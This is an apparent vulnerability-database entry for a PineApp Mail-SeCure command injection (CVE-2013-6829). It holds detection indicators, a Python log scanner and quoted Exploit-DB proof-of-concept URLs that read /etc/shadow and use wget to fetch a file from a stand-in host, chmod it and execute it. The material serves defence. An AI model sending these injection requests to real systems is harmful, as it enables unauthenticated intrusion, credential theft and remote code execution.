CVE-2013-6829
Published 2013-11-20
Priority: P2 · 76 · high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 78.34% (99.5th percentile)
admin/confnetworking.html in PineApp Mail-SeCure allows remote attackers to execute arbitrary commands via shell metacharacters in the pinghost parameter during a ping operation.
Detection & IOCs (extracted from sources)
url: https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow
- Detect unauthenticated HTTP GET requests to /admin/confnetworking.html that contain shell metacharacters (semicolons) in the nsserver or pinghost parameters; these indicate command injection attempts.
- Alert on requests to /admin/confnetworking.html on port 7443 where query parameters contain semicolons (literal ; or URL-encoded %3B) followed by shell commands such as wget, cat, chmod, or echo.
- Monitor for creation or modification of /tmp/rc.firewall, which is abused for privilege escalation to root via a weak sudoers configuration.
- Detect SSH connections to the appliance on non-standard port 7022, which may indicate post-exploitation root access following the SSH key injection technique described in the exploit.
- Flag HTTP requests targeting test_li_connection.php on PineApp Mail-SeCure; this endpoint is exploited for arbitrary command execution through insecure use of the PHP system() function.
- Note: the exploit proof-of-concept uses a hardcoded private IP (192.168.24.24); real-world attacks will use the actual appliance IP. Detection rules should not rely on this specific IP.
- Note: the vulnerability in confnetworking.html requires no authentication, so network-level access controls (firewall rules restricting port 7443) are the primary mitigation if patching is not possible.
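The first two detection points above can be applied to web access logs as follows. This is an added example, not code from the advisory or the vendor. It assumes a combined-log-style request field; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: the log's request field looks like "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
WATCHED_PATH = "/admin/confnetworking.html"
WATCHED_PARAMS = {"nsserver", "pinghost"}
# Characters a shell treats as separators, pipes, redirection or substitution.
SHELL_META = re.compile(r"[;|&`$()<>\n]")

# Constructed sample log lines (client addresses are documentation ranges).
SAMPLE_LOG = [
    '203.0.113.10 - - [20/Nov/2013:10:00:01 +0000] "GET /admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es HTTP/1.1" 200 512',
    '198.51.100.7 - - [20/Nov/2013:10:02:13 +0000] "GET /admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow HTTP/1.1" 200 2048',
    '198.51.100.7 - - [20/Nov/2013:10:02:40 +0000] "GET /admin/confnetworking.html?pinghost=127.0.0.1%3Becho%20test HTTP/1.1" 200 300',
    '203.0.113.10 - - [20/Nov/2013:10:03:00 +0000] "GET /index.html?q=a;b HTTP/1.1" 200 100',
]

def suspicious_params(target):
    """Return {param: decoded value} for watched params holding shell metacharacters."""
    parts = urlsplit(target)
    if parts.path != WATCHED_PATH:
        return {}
    hits = {}
    # Split on '&' only, so a literal ';' stays inside the parameter value.
    for name, value in parse_qsl(parts.query, keep_blank_values=True, separator="&"):
        value = unquote(value)  # second decode also catches double encoding (%253B)
        if name.lower() in WATCHED_PARAMS and SHELL_META.search(value):
            hits[name.lower()] = value
    return hits

def scan(lines):
    """Return (line number, hits) for each log line that should raise an alert."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        hits = suspicious_params(m.group("target")) if m else {}
        if hits:
            findings.append((n, hits))
    return findings

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {hits}")
```

Matching on the decoded value rather than the raw request line covers both the literal `;` and the `%3B` form without relying on the source IP or a fixed command list.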
No detection rules found.
Exploit-DB
PineApp MailSecure - Remote Command Execution
exploitdb · 2013-11-20
CVE-2013-6831 PineApp MailSecure - Remote Command Execution
---
It is possible to execute any bash command as the unprivileged qmailq user by sending
only the following HTTPS request, without authentication.
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow
Uploading any file (script, binary, etc.) is possible with the wget
command.
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile
Downloading and executing it is possible with this request:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile;chmod%20+x%20somefile;/t
Metasploit
PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution
metasploit
This module exploits a command injection vulnerability in PineApp Mail-SeCure 3.70. The vulnerability exists in the test_li_connection.php component, due to insecure usage of the PHP system() function. This module has been tested successfully on PineApp Mail-SeCure 3.70.
No writeups or analysis indexed.